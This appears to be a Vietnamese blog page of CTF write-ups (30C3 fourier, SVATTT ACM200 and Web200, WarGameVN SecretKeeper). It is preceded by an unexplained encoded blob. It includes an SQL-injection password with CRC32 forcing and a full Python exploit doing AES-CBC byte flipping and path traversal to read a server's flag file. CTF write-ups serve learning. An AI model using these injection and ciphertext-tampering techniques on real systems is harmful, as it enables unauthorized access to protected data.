MTZWVEJPVkZreFRsUk5lRTVxVFRGT2FsVXlUbFJWTVUxNldtbE5lbXN4VFhwU2EwNVVXVEZPCmFr MHdUbFJaTUU1RVVYbE9WRTB4VGxSYWFVMTZSVE5OYWxKc1RsUm5NQXBPYWxsNFRrZFJlazFxVlhs T2FrVXhUbXBhYVU1WFJUTk4KYWxreFRrUlpNVTFxWXpCTlIwVXdXa1JWTVU1NlFUSlplbGw0VGpK Rk1VNXFWVEpPVkZreFRucE5kMDU2WnpGT1JFMTRDazVYUlRCTwplbFV5VGxSbk1sbDZWVFJPVkZs NlRYcFJlVTVVWnpGUFZGVXhUbFJWZWsxVVVteE9hbU16VFVSV2FFNXFWVEpaYWxwcVRrZE5NVTVx ClVUSk9hbWN6VG5wVk1rNXRTWG9LVFZSamVVNUhWVEZPYWxVeVRsUlJNVTVxVVRGT1YwVXhUVlJW TVU1dFNURlpWRkpwVG1wTk1sbDYKVlhsT2VrMHhUbFJhYWs1NlFUQmFWRlV5VG0xUk0wOUVWVEpP VkZreFRucE5lQXBOZWxFeFRrUk5lVTVFV1ROTmFrSm9UbXBGZWsxNgpXVEJPVkZVeVRXcGFiRTVF U1ROTlZGVXdUbTFKTVU1VVRYaE9WRmt4VG1wWk1FNVVWVEZOYWxwcFRYcHJNbGw2V1hsT1JGa3hD azVVCll6Tk9WRmt3VG5wTk1VNTZZekZOVkZwcFRYcEZNRTU2V1hsT1JHY3dUbXBWTTA1VVdUQk9W RkpvVGxSQk1WbFVWVE5OZWtVd1dsUloKTVU1dFRURk5hbFV5VGxSVk1scEVVVElLVG1wbk1rMVVa R2hPVkZrelQwUlJlazV0VFRCYVZGVXhUbFJGTWxscVRUVk9WR014VFdwYQphazVVV1hwT1JGVXlU a1JaTWs5RVl6Tk9WRmt5V1dwTmVFNVVXWGRaVkZKclRsUlpNUXBPYWxVeFRsUmpNRTU2WXpST1ZF RXhUMVJWCk0wNTZUVE5QUkZKc1RtMU5NVTFVWXpST1ZGVXlXWHBXYUU1dFNUSk9SRTE2VGtSSk1V MUVWVEpPYlVreFRtcFZNazVxVlRGT2Fsa3cKQ2s1NlVUSk5lbEV4VFh
Lưu ý: Nếu các bạn vào ngay bây giờ, sẽ nhận được một thông báo không mấy dễ chịu, tuy nhiên đó không phải là lỗi (nó cũng không phải là một tính năng)
[30C3 CTF] fourier (Numbers200)
Heres one for those that like numbers and mathematics…
Mở bài
Chúng ta được cung cấp cho 1 file fourier (elf) và 1 file flag.four (data). File fourier dùng để mã hóa, còn file flag.four, dĩ nhiên, là flag đã được mã hóa.
Thân bài
Sau một chút thời gian (rất dài) bỡ ngỡ khi thấy các thím ấy sử dụng GMP cho việc tính toán, mình cũng thể hiện được phẩm chất vượt trội trong thao tác mò code để mô phỏng lại thuật toán mã hóa như sau (nhìn chung thì khá dễ, mỗi tội hơi khó) :
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 |
import random random.seed(69) in_file = open('flag', 'r').read() out_file = open('flag.four', 'wb') secret = int(in_file.encode('hex'), 16) while (secret >= 24): random_number = number_3 = 0 number_3 = secret - 4 number_3 <<= 2 number_3 -= 5 if (number_3 > 0x444): number_3 = 0x444 random_number = random.randint(0, number_3 - 1) random_number += 5 number_4 = 0 while (number_4 != random_number): number_4 += 1 out_file.write('4') out_file.write(' ') number_4 = 4 number_5 = 0 while (number_4 < secret): out_file.write('4') number_5 = number_4 number_4 *= random_number number_4 += 4 secret -= number_5 out_file.write(' ') while (secret != 0): secret -= 1 out_file.write('4') out_file.close() |
Ngoại trừ các thao tác mà mình đã đối chiếu và thấy khá tương đồng, vấn đề duy nhất tồn đọng là hàm random.
1 2 |
.text:0000000000400CA1 lea rdi, [rsp+98h+random_handle] ; Load Effective Address .text:0000000000400CA6 call ___gmp_randinit_default ; Call Procedure |
Target sử dụng hàm ___gmp_randinit_default và hơi lạ là khi mình debug lại thấy các kết quả random bị lặp lại. Mình cũng mất hơi nhiều thời gian cho việc cài đặt và chạy thử cái GMP này, rồi nhờ luật nhân quả nên sau đó điểm sáng xuất hiện:
1 2 3 4 |
number_4 = 0 while (number_4 != random_number): number_4 += 1 out_file.write('4') |
Ở đây ta thấy rằng chương trình làm một việc, đó là ghi ra giá trị sau khi random (mỗi đơn vị ứng với một byte ‘4‘). Và tổng quan thì cái thuật toán mã hóa khi hiểu đơn giản sẽ như sau:
- Nếu secret còn lớn hơn 24, thì chạy một vòng lặp, mỗi lượt ghi ra 2 giá trị:
- Khi secret nhỏ hơn 24, ghi ra secret.
Như thế, nếu ta chia file flag.four ra các phần ngăn cách bởi dấu cách (0x20), giá trị mỗi phần là độ dài của phần đó (vd ‘444‘ = 3), thì hàm giải mã có nhiệm vụ:
- Đọc ngược từ phần cuối về phần đầu (tức phần đầu tiên được đọc sẽ là phần cuối của file).
- Gán secret = phần đầu.
- Chạy vòng lặp cho đến khi hết nội dung:
- Đọc phần tiếp theo, đó chính là số lần lặp của X_LOOP.
- Đọc phần tiếp theo, đó chính là random_number.
- Tất cả giá trị đều đã đủ, ta có thể tính toán được number_5, và thêm vào secret.
- Chuyển đổi secret từ DEC qua ASCII.
(lý do vì sao lại đọc từ cuối trở về mà không đọc từ đầu trở đi trong khi 2 hướng nó như nhau, thì là vì, mình thích thế đấy
Code minh họa:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 |
cipher = open('flag.four', 'r').read() parts = cipher.split(' ') secret = len(parts[len(parts) - 1]) part_index = len(parts) - 2 while (part_index > 0): loop_count = len(parts[part_index]) random_number = len(parts[part_index - 1]) number_4 = 4 number_5 = 0 for i in range(loop_count): number_5 = number_4 number_4 *= random_number number_4 += 4 secret += number_5 part_index -= 2 print hex(secret)[2:-1].decode('hex') |
Kết bài
1 |
30C3_the_challenge_is_named_fourier_what_else_did_you_expect? |
[SVATTT CTF 2013] Điệp vụ bất khả thi (ACM200)
Trong lúc các đồng đội của mình đang thực hiện thao tác trên các hệ thống nội bộ, Võ bằng kinh nghiệm truy vết của mình tìm ra 1 dịch vụ lạ trên một máy chủ đặt tại nhà riêng của Snowden. Tuy nhiên dịch vụ được bảo vệ bởi một số đoạn mã với yêu cầu vô cùng phức tạp mà chỉ có Anonymous mới nắm giữ bí quyết khởi tạo. Công việc tưởng bất khả thi nhưng chưa đầy 1 nốt nhạc sau, Võ đã nắm trong tay kết quả…
Challenge: nc 138.91.39.179 45456
Không đội nào giải được? Ok, đây là lúc để mình tỏa sáng
Nội dung chính
Kết nối đến server, ta nhận được lời chào:
Prove that you are one of us! This is the new algorithm we have developed for our VenaSploit tool
We give you a set of character, you need to give me back a long enough string such that every 4 consecutive bytes is unique
All characters in the charset should be included for it to be valid. A charset is given between the tag <pre>
Example: <pre>01</pre> length: 8 , Answer: 00010111Charset: <pre>01</pre>
Give me a pattern of size at least 16 using the given charset:
Như vậy, nhiệm vụ của chúng ta là tìm một chuỗi có kích thước n, được tạo bởi một tập các ký tự cho trước, với điều kiện là 4 ký tự bất kỳ liền kề không được trùng nhau (mình gọi là tính chất UEY). Ví dụ chuỗi:
0001110001100
là không hợp lệ, do 1100 xuất hiện 2 lần. Còn một điều kiện nữa là tất cả các ký tự trong charset đều phải được dùng, tuy nhiên điều này không mấy quan trọng.
Thuật toán
Kể từ ngày tham gia một cuộc thi chính thức đầu tiên (DEFCON thì phải) và giải được 2 bài thuộc thể loại coding tương tự, mình đã hiểu rằng mình sẽ yêu nó. Ít nhất thì đến bây giờ, mình vẫn còn cảm thấy hứng thú và bình yên với cái thể loại nhí nhảnh và nhộn nhịp này
Bắt đầu từ thử thách thứ nhất, tạo chuỗi dài 16 ký tự, charset là 01. Ta thấy kích thước charset là 2, và 2^4 = 16 (4 chính là kích thước nhóm ký tự không lặp lại). Người thì bảo là trùng hợp, nhưng mình thì, cũng nghĩ thế
Lúc đầu, mình cho rằng bài này cần đến thuật toán quay lui, nhưng sau đó, mình không chứng minh, nhưng đoán rằng có thể chứng minh được, là tại mỗi bước, luôn tìm được ký tự tiếp theo để chuỗi mới vẫn là chuỗi hợp lệ (thỏa mãn tính chất UEY). Lý do thì rất đơn giản: mình đã thử, và hình như đã thành công.
Nhưng như vậy vẫn là chưa đủ, điều quan trọng nằm ở việc tối ưu code, nhất là việc kiểm tra tính hợp lệ của chuỗi mới sau mỗi bước. Ok, việc chạy một vòng lặp đi suốt chiều dài chuỗi vài nghìn ký tự tốn không đáng là bao nhiêu công sức, tuy nhiên nếu tưởng tượng rằng cái công sức đó bị nhân lên vài nghìn lần, mọi thứ sẽ khác. Thêm nữa, mỗi khi thêm mới một ký tự, tại sao chúng ta lại phải kiểm tra lại cái phần đã được kiểm tra trước đó? Máy yếu thực sự không thích điều này
Giải pháp mình đưa ra sau vài tiếng đứng chôn chân trên xe bus, đó là lên danh sách sẵn các pattern (nhóm 4 ký tự), gọi là available_patterns dựa trên charset bài cho, khởi tạo giá trị 1 cho mỗi pattern (cũng chính là mỗi phần tử của mảng: key => value), và mỗi khi thêm một ký tự, ta kiểm tra pattern mới nhất (4 ký tự cuối của chuỗi) có nằm trong available_patterns hay không (giá trị của phần tử = 1), nếu có, ta coi ký tự vừa thêm hợp lệ (chưa được dùng), ta sẽ sử dụng nó, đồng thời gán phần tử ứng với pattern đó bằng 0; ngược lại, nếu giá trị của phần tử đã bằng 0, tức pattern đó đã được sử dụng, ta bỏ qua ký tự vừa thêm và thay bằng ký tự khác. Việc truy xuất giá trị một phần tử của mảng là nhanh vô cùng, nên ta khỏi lo bị chậm
Cơ mà một vấn đề mới lại phát sinh sau khi mình cài đặt thử, đó là đối với charset quá rộng, thì kích thước các pattern hợp lệ là rất lớn, chiếc máy nhỏ xinh của mình bị báo MemoryError ngay sau vài nốt nhạc. Hướng giải quyết là gì?
Là thôi không lập chỉ mục sẵn nữa, nhưng vẫn phải tìm cách để biết được pattern nào đã dùng rồi, pattern nào chưa. Điều này tưởng như đơn giản, nhưng hóa ra lại… đơn giản thật. Đó là với đối tượng dictionary (python), khi ta truy xuất một phần tử không có trong từ điển, exception sẽ nhảy ra (mà chắc ngôn ngữ nào cũng vậy thôi). Như thế, ta sử dụng một dictionary để lưu những pattern đã được dùng, thì khi kiểm tra, nếu có exception, tức là pattern đó chưa có trong từ điển (nghĩa là nó hợp lệ), và ngược lại. Chỉ có vậy thôi
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 |
import socket import sys sys.setrecursionlimit(30000) found = False flag = '' def gen_next_string(current_string, length, charset, used_patterns): global found, flag if found: return flag # progress sys.stdout.write("current length: %d / %dr" % (len(current_string), length) ) sys.stdout.flush() for char in charset: new_string = current_string + char new_pattern = new_string[-4:] try: used_patterns[new_pattern] except: # if new_pattern has not been used used_patterns[new_pattern] = 1 if len(new_string) < length: next_string = gen_next_string(new_string, length, charset,used_patterns) if (next_string != None): return next_string else: found = True flag = new_string del used_patterns[new_pattern] return None def create_string(length, charset): global found, flag found = False flag = '' start_string = charset[0] * 4 used_patterns = {} used_patterns[start_string] = 1 gen_next_string(start_string, length, charset, used_patterns) print "n" HOST = '138.91.39.179' PORT = 45456 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, PORT)) while True: found = False flag = '' message = s.recv(1024) message += s.recv(1024) # print message try: charset = str(message.split('Charset: <pre>')[1].split('</pre>')[0]) length = int(message.split('Give me a pattern of size at least ')[1].split(' using the given charset: ')[0]) print 'len(charset):', len(charset), ', length:', length create_string(length,charset) # print 'flag:', flag s.send(flag + "n") except: # flag print message sys.exit(0) |
Sau một thời gian chạy khá nhanh (có lâu thì cũng là do đề bài cho charset quá phức tạp và length quá dài thôi, chứ thuật toán thì generate ra flag nhanh lắm ), ta có cờ:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 |
len(charset): 2 , length: 16 current length: 15 / 16 len(charset): 3 , length: 81 current length: 80 / 81 len(charset): 6 , length: 1296 current length: 1295 / 1296 len(charset): 8 , length: 2506 current length: 2505 / 2506 len(charset): 26 , length: 2677 current length: 2676 / 2677 len(charset): 52 , length: 3283 current length: 3282 / 3283 len(charset): 98 , length: 4239 current length: 4238 / 4239 len(charset): 103 , length: 4315 current length: 4314 / 4315 len(charset): 179 , length: 6031 current length: 6030 / 6031 len(charset): 117 , length: 5049 current length: 5048 / 5049 len(charset): 107 , length: 4867 current length: 4866 / 4867 len(charset): 157 , length: 5173 current length: 5172 / 5173 len(charset): 164 , length: 6109 current length: 6108 / 6109 len(charset): 106 , length: 4882 current length: 4881 / 4882 len(charset): 174 , length: 5765 current length: 5764 / 5765 len(charset): 102 , length: 4488 current length: 4487 / 4488 len(charset): 156 , length: 5671 current length: 5670 / 5671 len(charset): 119 , length: 4767 current length: 4766 / 4767 len(charset): 111 , length: 4736 current length: 4735 / 4736 Your Flag: SVATTT_US3_PEDA_D0NT_Y0U? |
Your Flag: SVATTT_US3_PEDA_D0NT_Y0U?
[SVATTT CTF 2013] Vết tích tại hiện trường (Web200)
Anonymous đã upload thành công một script backdoor của bọn chúng lên server ngân hàng Trung Ương với mục đích sẽ quay lại kiếm lợi sau này. Nhưng để truy xuất file, bạn cần phải biết password của chúng đã qui ước với nhau từ trước. Chỉ mất khoảng 10 phút, Chiến đã bypass được. Thế còn các bạn thì sao? :)
Challenge: Link
Hint: hint.txt
Chúng ta có một vùng nhập séc rét, và file hint.txt có nội dung xinh xinh:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
----------------------------snip snip------------------------------------- $password = $_GET['password']; $checkcrc = dechex(crc32($password)); if (strpos($password, "Anonymous") === false || $checkcrc !=="deadc0de") { echo "<br><font color='red'>"."Bad password"."</font><br>"; die(); } ....................... $result = $db->query("SELECT * FROM web200 where code='$password'"); ----------------------------snip snip------------------------------------- |
Nội dung chính
Ta thấy rằng, yêu cầu của bài này là tìm một password thỏa mãn 2 điều kiện:
- Có chứa Anonymous.
- CRC32(password) = deadc0de.
Sau đó, (có lẽ là) flag sẽ được lấy từ database qua câu query:
1 |
SELECT * FROM web200 where code='$password' |
Như vậy, nhiệm vụ của chúng ta, ngoài việc tìm password thỏa mãn 2 điều kiện vừa nói ở trên, còn có thêm một yếu tố nữa, đó là bypass được câu query SQL cuối cùng.
Với 2 nhiệm vụ đầu, công việc khá đơn giản, do giá trị CRC32 có thể được chỉnh sửa tùy ý bằng cách thay đổi 4 byte trong password. Một vài tool trên mạng cho phép chúng ta làm điều này, thay vì tự code, ví dụ như:
Giờ nếu ta tạo password ban đầu là:
Anonymousabcd
và dùng tool trên, kết quả cho ra:
Anonymous[q>_
Đây là một password khá đẹp, nó có chứa Anonymous, và CRC32 của nó đúng bằng deadc0de. Tuy nhiên khi submit, ta nhận thông báo sau:
Anonymous: Nice try! But You are doing it wrong :)
Ok, đây là điều chúng ta đã dự đoán từ trước, do vẫn chưa giải quyết được phần SQL.
Tuy vậy, việc inject câu query này xem chừng khá đơn giản, chúng ta sẽ thử với một password khá gia giáo và truyền thống:
Anonymous' OR 1=1--aaaa
Submit sau khi đã đưa nó qua forcecrc32.py, thông báo trả về xấu hơn một chút:
Bad input :)!
Vậy là có dính phải các ký tự bị cấm rồi
Thử thêm chút nữa, ta thấy các ký tự bị cấm dường như là: <space>, <comment> blah blah… tuy nhiên các từ khóa and, or, dấu nháy đơn (‘) và dấu chấm phẩy (;) thì không bị. Hơ, thế cũng là đủ rồi
Password cuối cùng mà ta lựa chọn sẽ là:
Anonymous'or'1'='1';aaaa
Makeup một chút với CRC32, ta được password xịn:
Anonymous'or'1'='1';nx9Dxx92
Submit:
Anonymous: Not bad! Here is your flag
SVATTT_crc_0r_n0t_CRC
[WarGameVN CTF] SecretKeeper (Web300)
Đây là nơi trao đổi bí mật giữa các tên trùm.
Source: ~
Rất cảm ơn BTC vì đã gìn giữ để cái URL nó sống đến tận bây giờ
Đây là một bài mà hồi đó, mình nhìn nó với một sự ngưỡng mộ sâu sắc, và thậm chí, ngay cả khi có một vài member kiệt xuất trong team mình miên man bình luận về nó thì mình vẫn như một thằng lơ ngơ không hiểu gì.
Mình thích cái cảm giác lâu lâu quay lại một bài nào đó, một bài mà trước đây mình không làm được, thậm chí không biết nó hỏi cái gì, nó cần cái gì, rồi sau đó nó hét lên với mình: “Cờ của mày đây!”, cảm giác thật thanh thản và bình yên
Ngày còn bé (cụ thể là cấp 3), mình cực kỳ yếu tích phân, và dù cho đã cố lăn lộn với nó trong suốt 3 năm học, cộng với vài ngày sát kỳ thi ĐH, mình vẫn ra về tay trắng. Mình nhớ như in cái cảm giác đó, cái cảm giác mà mình thực sự đã sinh ra vì một mục đích khác, một mục đích mà không liên quan khỉ gì đến tích phân cả, rằng thì là cả đời này mình cũng vẫn nấp dưới danh nghĩa của một thằng không thể giải được bài tích phân nào trong đề thi ĐH
Ấy thế mà lên ĐH, mình lại bá đạo vô cùng về mấy cái thứ gớm ghiếc này, tất cả thay đổi, cuộc sống thay đổi, lòng người cũng thay đổi. Mình từng ghét Vật Lý, rồi mình yêu Vật Lý, mình từng ghét Console, rồi mình yêu Console, mình từng ghét Tích phân, và rồi mình yêu Tích phân. Lý do cũng chỉ có một, đó là nếu ta yêu một ai đó, ta sẽ… không còn ghét họ nữa (đệch ). Thôi nói tóm lại, là một khi mình đã thấy mặt lợi ích của cái gì đó mang lại, thì mình sẽ không còn thấy nó vô bổ nữa…
Nội dung chính
Ở bài này, chúng ta có một vùng để nhập séc rét, điền thử:
^_^
và nhấn Save, chúng ta có một cái link:
http://challenges.wargame.vn:1337/web300_c4d7c1d9c925b4021adf5e192315ecb9/?file=dbf8adc50a348b9e808d204825c7aed2d4430f900ed7b96daec2a3c1d6665a2792cdb3104d2666e64e069d87cd286765d29b0c16ca1ab2d26249735974d6fb50&sign=730646501b5d8c9a234686a9bcc580bb
Khá dài và khá hãi… Xem source thì có được:
1 2 3 4 |
<blockquote class="curly-quotes" cite="./secret/b764b44fd336b8281b62b257501ad3c6"> ^_^ </blockquote> |
Như đề bài đưa, source nằm ở index.phps, xem nó thôi:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 |
<?php session_start(); ?> <!DOCTYPE html> <!--[if lt IE 7]> <html class="lt-ie9 lt-ie8 lt-ie7" lang="en"> <![endif]--> <!--[if IE 7]> <html class="lt-ie9 lt-ie8" lang="en"> <![endif]--> <!--[if IE 8]> <html class="lt-ie9" lang="en"> <![endif]--> <!--[if gt IE 8]><!--> <html lang="en"> <!--<![endif]--> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <title>SecretKeeper v1.0</title> <link rel="stylesheet" href="css/style.css"> <!--[if lt IE 9]><script src="//html5shim.googlecode.com/svn/trunk/html5.js"></script><![endif]--> </head> <body><br /><br /><br /> <div class="mainform"> <h1>SecretKeeper v1.0</h1> <?php function strToHex($string) { $hex=''; for ($i=0; $i < strlen($string); $i++){ $tmp = dechex(ord($string[$i])); $hex .= (strlen($tmp)==1)?"0".$tmp:$tmp; } return $hex; } function hexToStr($hex) { $string=''; for ($i=0; $i < strlen($hex)-1; $i+=2) $string .= chr(hexdec($hex[$i].$hex[$i+1])); return $string; } // // encrypt + decrypt AES // include("init.php"); // define _KEY,_IV,_SECRET // flag in ./secret/flag.php function encrypt_($str){ return strToHex(mcrypt_encrypt(MCRYPT_RIJNDAEL_128, _KEY, $str, MCRYPT_MODE_CBC,_IV)); } function decrypt_($str){ return rtrim(mcrypt_decrypt(MCRYPT_RIJNDAEL_128, _KEY, hexToStr($str), MCRYPT_MODE_CBC,_IV)," "); } function hmac_($msg,$secret){ return hash_hmac('md5',$msg,$secret); } if(!empty($_POST['secret']) && is_string($_POST['secret']) && strlen($_POST['secret']) < 1337){ $secret_hmac = md5(_SECRET.rand(0,1337),true); $secret_filename = md5(session_id.$secret_hmac); file_put_contents("./secret/".$secret_filename,$_POST['secret']); $secret_link = encrypt_($secret_filename."|".$secret_hmac); echo "<br /><p align='center'><a class='button button-blue' href='?file={$secret_link}&sign=".hmac_($secret_filename,$secret_hmac)."'>Your secret</p></a>"; }elseif(!empty($_GET['file'])){ $decrypt = explode("|",decrypt_($_GET['file'])); $secret_filename = $decrypt[0]; $secret_hmac = $decrypt[1]; $hmac_ = $_GET['sign']; $error = false; if(strlen($secret_hmac) != 16){ echo "HMAC: Bad length! (".strlen($secret_hmac).")<br />"; $error = true; } if(hmac_($secret_filename,$secret_hmac)!==$hmac_){ echo "HMAC: Not match!<br />"; $error = true; } ?> <section class="notepaper"> <figure class="quote"> <blockquote class="curly-quotes" cite="./secret/<?=$secret_filename?>"> <?php if(!$error) echo file_get_contents("./secret/".basename($secret_filename)); // anti directory traversal else echo "ERROR!"; ?> </blockquote> </figure> </section> <?php }else{ ?> <form action="?save" method="POST"> <p><textarea name="secret" rows="10" cols="80" placeholder="Your secret!"></textarea></p> <p align="center"><input type="submit" name="confirm" value="Save" class="button button-blue"></p> </form> <?php } ?> </div> </body> </html> |
Ta sẽ chia code làm 2 phần chính: Mã hóa và Giải mã, còn nhiệm vụ của chúng ta là đọc file ./secret/flag.php.
Mã hóa
1 2 3 4 5 6 7 8 |
if(!empty($_POST['secret']) && is_string($_POST['secret']) && strlen($_POST['secret']) < 1337) { $secret_hmac = md5(_SECRET.rand(0,1337),true); $secret_filename = md5(session_id.$secret_hmac); file_put_contents("./secret/".$secret_filename,$_POST['secret']); $secret_link = encrypt_($secret_filename."|".$secret_hmac); echo "<br /><p align='center'><a class='button button-blue' href='?file={$secret_link}&sign=".hmac_($secret_filename,$secret_hmac)."'>Your secret</p></a>"; } |
$secret_hmac, $secret_filename được tạo ngẫu nhiên, sau đó ghép vào với ký tự ngăn cách là ‘|‘, cuối cùng mã hóa thành tham số file cho url. Tham số còn lại, sign, dùng cho mục đích kiểm tra tính hợp lệ của $secret_filename (mình sẽ trình bày sau).
Nói chung phần này không có gì nhiều, ta kệ nó, cho nó chơi một mình.
Giải mã
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 |
elseif(!empty($_GET['file'])) { $decrypt = explode("|",decrypt_($_GET['file'])); $secret_filename = $decrypt[0]; $secret_hmac = $decrypt[1]; $hmac_ = $_GET['sign']; $error = false; if(strlen($secret_hmac) != 16){ echo "HMAC: Bad length! (".strlen($secret_hmac).")<br />"; $error = true; } if(hmac_($secret_filename,$secret_hmac)!==$hmac_){ echo "HMAC: Not match!<br />"; $error = true; } <section class="notepaper"> <figure class="quote"> <blockquote class="curly-quotes" cite="./secret/<?=$secret_filename?>"> <?php if(!$error) echo file_get_contents("./secret/".basename($secret_filename)); // anti directory traversal else echo "ERROR!"; ?> </blockquote> </figure> </section> <?php } |
Trình tự thực hiện là:
- Giải mã tham số file.
- Chia làm 2 phần, ngăn cách bởi ký tự ‘|‘.
- Phần 1 là $secret_filename, phần 2 là $secret_hmac.
- Dùng tham số sign để kiểm tra tính hợp lệ của $secret_filename, nếu ok thì in ra nội dung của nó.
Như thế, chúng ta thấy được 2 việc chính cần làm:
- Xác định tham số file để $secret_filename trỏ đến file ./secret/flag.php.
- Xác định tham số sign ứng với tham số file để pass bước 4.
Xác định tham số file
Thuật toán mã hóa được sử dụng là AES 128bit (16 byte cho mỗi block), mode CBC, nên chúng ta có thể nghĩ ngay đến Byte Flipping
Do $secret_filename là MD5, kích thước 32 byte, chúng ta sẽ can thiệp vào block đầu tiên của cipher, để thay đổi block thứ hai của plain text. Nhưng cũng cần lưu ý rằng block đầu của plain text sẽ thành rác, và chúng ta cần chỉnh sửa đường dẫn của file flag cho phù hợp. Ví dụ, ta có một đường dẫn hợp lệ là:
^#%&$%$@@$#%%^$abcde/../flag.php
Bắt đầu từ url nhận được lúc đầu, ta dùng đoạn code sau để thu được tham số file mong muốn:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |
def get_filename(file): url = 'http://challenges.wargame.vn:1337/web300_c4d7c1d9c925b4021adf5e192315ecb9/?file=%s&sign=%s' % (file, 'xxx') source = get_url_content(url) filename = source.split('cite="./secret/')[1].split('"')[0] return filename # === Byte Flipping 1 === target = 'aaaa/../flag.php' filename = 'b764b44fd336b8281b62b257501ad3c6' file = 'dbf8adc50a348b9e808d204825c7aed2d4430f900ed7b96daec2a3c1d6665a2792cdb3104d2666e64e069d87cd286765d29b0c16ca1ab2d26249735974d6fb50'.decode('hex') for pos in range(len(target)): file = change_byte(file, pos, chr(ord(filename[pos+16]) ^ ord(target[pos]) ^ (ord(file[pos])))) print 'file:', file.encode('hex') filename = get_filename(file.encode('hex')) print 'filename: ', filename # === Byte Flipping 1 === |
1 2 |
file: 8bfbfa9647289086d3d1704e6f84a594d4430f900ed7b96daec2a3c1d6665a2792cdb3104d2666e64e069d87cd286765d29b0c16ca1ab2d26249735974d6fb50 filename: _:$╓¥ì≤¬²æ╗Uz╦[aaaa/../flag.php |
Xác định tham số sign
Dù rằng $secret_filename xem chừng đã hợp lệ, ta vẫn chưa đọc được nội dung của nó, do bị bước 4 chặn lại. Để ý rằng, sign được tính như sau:
1 |
$sign = hmac_($secret_filename,$secret_hmac) |
mặt khác, cả $secret_filename và $secret_hmac đều là các thành phần trong tham số file, được ngăn cách bởi ký tự ‘|‘, nhưng task chỉ hiển thị $secret_filename cho ta thấy.
Để có $secret_hmac, điều duy nhất mà ta làm được, đó là Flipping thêm một Byte nữa, mục đích là thay đổi ký tự ‘|‘ thành ký tự khác, khi đó câu lệnh:
1 2 |
$decrypt = explode("|",decrypt_($_GET['file'])); $secret_filename = $decrypt[0]; |
sẽ trả về $secret_filename chứa cả $secret_hmac (do không còn ký tự ngăn cách), và bằng cách lấy 16 ký tự cuối, ta có thứ mình cần
Ta biết rằng ký tự ‘|‘ sẽ ở block 3 ($secret_filename là MD5, kích thước 32 byte = 2 block), nên để thay đổi nó, ta sẽ can thiệp vào block 2 của cipher, mà cụ thể là byte thứ 17. Tất nhiên điều này sẽ làm hỏng $secret_filename, nhưng hiện tại nó không còn quan trọng nữa.
1 2 3 4 |
file = change_byte(file, 16, '1') filename = get_filename(file.encode('hex')) secret_hmac = filename[-16:] print 'secret_hmac:', secret_hmac.encode('hex') |
1 |
secret_hmac: 271876ad58fdba9d870d1c6ad3f6f94c |
Giờ thì chúng ta đã có thể thoải mái tính sign, like a boss
:
1 2 |
sign = hmac.new(secret_hmac, secret_filename, hashlib.md5).hexdigest(); print 'sign:', sign |
1 |
sign: 68b3b5f8599fb8939ce1b5b9cb7ce46a |
Tổng kết
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 |
import urllib, urllib2 import hmac,hashlib def get_url_content(url): req = urllib2.Request(url) source = urllib2.urlopen(req).read() return source def change_byte(string, pos, new_byte): new_str = '' for i in range(len(string)): if i != pos: new_str += string[i] else: new_str += new_byte return new_str def get_filename(file): url = 'http://challenges.wargame.vn:1337/web300_c4d7c1d9c925b4021adf5e192315ecb9/?file=%s&sign=%s' % (file, 'xxx') source = get_url_content(url) filename = source.split('cite="./secret/')[1].split('"')[0] return filename # === Byte Flipping 1 === target = 'aaaa/../flag.php' filename = 'b764b44fd336b8281b62b257501ad3c6' file = 'dbf8adc50a348b9e808d204825c7aed2d4430f900ed7b96daec2a3c1d6665a2792cdb3104d2666e64e069d87cd286765d29b0c16ca1ab2d26249735974d6fb50'.decode('hex') for pos in range(len(target)): file = change_byte(file, pos, chr(ord(filename[pos+16]) ^ ord(target[pos]) ^ (ord(file[pos])))) print 'file:', file.encode('hex') filename = get_filename(file.encode('hex')) final_file = file.encode('hex') secret_filename = filename print 'filename: ', filename # === Byte Flipping 1 === # === Byte Flipping 2 === file = change_byte(file, 16, '1') filename = get_filename(file.encode('hex')) secret_hmac = filename[-16:] print 'secret_hmac:', secret_hmac.encode('hex') sign = hmac.new(secret_hmac, secret_filename, hashlib.md5).hexdigest(); print 'sign:', sign # === Byte Flipping 2 === # === Get Flag === url = 'http://challenges.wargame.vn:1337/web300_c4d7c1d9c925b4021adf5e192315ecb9/?file=%s&sign=%s' % (final_file, sign) print 'source:', get_url_content(url).split('<blockquote')[1].split('</blockquote>')[0] # === Get Flag === |
Flag = mario_CBCm0d3_is_swag_huh_;)
Ghi chú: Chúng ta cần để ý giá trị trả về của mỗi bước Byte Flipping, tránh để xuất hiện ‘|’, do điều này sẽ dẫn đến secret_hmac thu được bị sai.
[WhiteHat CTF 2013] I love Sherlock Holmes
Mình không có ý định sẽ writeup cho giải lần này, do không biết là có được phép public đề bài hay không. Tuy nhiên do có một số bạn quan tâm và muốn làm quen với CTF, mình xin phép dùng bài này để minh họa, do nó tương đối cơ bản và dễ tiếp cận.
